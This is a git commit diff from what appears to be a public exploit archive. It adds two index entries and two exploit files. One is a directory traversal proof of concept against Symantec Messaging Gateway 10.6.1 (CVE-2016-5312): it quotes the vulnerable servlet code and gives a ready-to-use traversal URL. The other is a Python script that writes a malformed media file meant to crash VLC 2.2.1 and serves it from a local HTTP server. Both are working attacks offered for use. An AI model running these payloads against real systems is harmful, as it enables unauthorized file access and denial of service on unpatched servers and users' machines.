DB: 2016-09-29
2 new exploits Symantec Messaging Gateway 10.6.1 - Directory Traversal VLC Media Player 2.2.1 - Buffer Overflow
This commit is contained in:
parent
f421077feb
commit
d86bdf5f80
3 changed files with 93 additions and 0 deletions
|
@ -35268,6 +35268,7 @@ id,file,description,date,author,platform,type,port
|
|||
38917,platforms/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0
|
||||
38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0
|
||||
38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0
|
||||
40437,platforms/java/webapps/40437.txt,"Symantec Messaging Gateway 10.6.1 - Directory Traversal",2016-09-28,R-73eN,java,webapps,0
|
||||
38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
|
||||
38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
|
||||
38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
|
||||
|
@ -36559,3 +36560,4 @@ id,file,description,date,author,platform,type,port
|
|||
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
|
||||
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
|
||||
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
|
||||
40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
53
platforms/java/webapps/40437.txt
Executable file
53
platforms/java/webapps/40437.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
|
||||
# Date : 28/09/2016
|
||||
# Author : R-73eN
|
||||
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
|
||||
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
|
||||
# Vendor : Symantec
|
||||
# CVE : CVE-2016-5312
|
||||
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
|
||||
#
|
||||
# ___ __ ____ _ _
|
||||
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
|
||||
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
|
||||
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
|
||||
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
|
||||
#
|
||||
#
|
||||
# DESCRIPTION:
|
||||
#
|
||||
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
|
||||
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
|
||||
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
|
||||
#
|
||||
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java
|
||||
The vulnerable code is
|
||||
extends HttpServlet {
|
||||
public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
|
||||
block6 : {
|
||||
try {
|
||||
String string = httpServletRequest.getParameter("sn");
|
||||
//**** Taking parameter "sn" and writing it to the "string variable"
|
||||
|
||||
|
||||
if (string == null) break block6;
|
||||
String string2 = string.substring(string.length() - 3);
|
||||
|
||||
byte[] arrby = (byte[])this.getServletContext().getAttribute(string);
|
||||
|
||||
//**** The string variable is passed here without any sanitanization for directory traversal
|
||||
//**** and you can successfully use this to do a directory traversal.
|
||||
|
||||
if (arrby != null) {
|
||||
httpServletResponse.setContentType("image/" + string2);
|
||||
ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
|
||||
httpServletResponse.setContentLength(arrby.length);
|
||||
servletOutputStream.write(arrby);
|
||||
this.getServletContext().removeAttribute(string);
|
||||
break block6;
|
||||
}
|
||||
|
||||
|
||||
POC:
|
||||
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
|
||||
|
38
platforms/windows/dos/40439.py
Executable file
38
platforms/windows/dos/40439.py
Executable file
|
@ -0,0 +1,38 @@
|
|||
Exploit Title: VLC Media Player 2.2.1 Buffer Overflow
|
||||
2016-09-28
|
||||
Author: sultan albalawi
|
||||
Software Link: https://www.videolan.org/vlc/releases/2.2.1.html
|
||||
Tested on:win7
|
||||
video :https://www.facebook.com/pentest3/videos/vb.100012552940568/189735791454851/?type=2&theater¬if_t=video_processed¬if_id=1475012468070044
|
||||
|
||||
*************************************************************************************
|
||||
filecreate = "payload.wmv" # create file (payload.wmv)
|
||||
buffer = ("\x23\x45\x58\x54\x4d\x33\x55\r\n\x23"+
|
||||
"\x45\x58\x54\x2d\x58\x2d\x53\x54\x52"+
|
||||
"\x45\x41\x4d\x2d\x49\x4e\x46\x3a\x50"+
|
||||
"\x52\x4f\x47\x52\x41\x4d\x2d\x49\x44"+
|
||||
"\x3d\x31\x2c\x42\x41\x4e\x44\x57\x49"+
|
||||
"\x44\x54\x48\x3d\x31\x2c\x52\x45\x53"+
|
||||
"\x4f\x4c\x55\x54\x49\x4f\x4e\x3d\x31"+
|
||||
"\x32\x30\x78\x33\x36\x30\r\n")
|
||||
buffer += filecreate
|
||||
open(filecreate, "wb").write(buffer)
|
||||
print "create file done {}".format(filecreate)
|
||||
import BaseHTTPServer
|
||||
import sys
|
||||
from SimpleHTTPServer import SimpleHTTPRequestHandler
|
||||
HandlerClass = SimpleHTTPRequestHandler
|
||||
ServerClass = BaseHTTPServer.HTTPServer
|
||||
Protocol = "HTTP/1.0"
|
||||
if sys.argv[1:]:
|
||||
port = int(sys.argv[1])
|
||||
else:
|
||||
port =8080
|
||||
server_address = ('192.168.100.3',8080)
|
||||
HandlerClass.protocol_version = Protocol
|
||||
httpd = ServerClass(server_address, HandlerClass)
|
||||
sa = httpd.socket.getsockname()
|
||||
print sa[0],sa[1],filecreate
|
||||
print "open vlc and open file {}".format(filecreate)
|
||||
print "LISTENING..",sa[0],sa[1],filecreate
|
||||
httpd.serve_forever()
|
Loading…
Add table
Reference in a new issue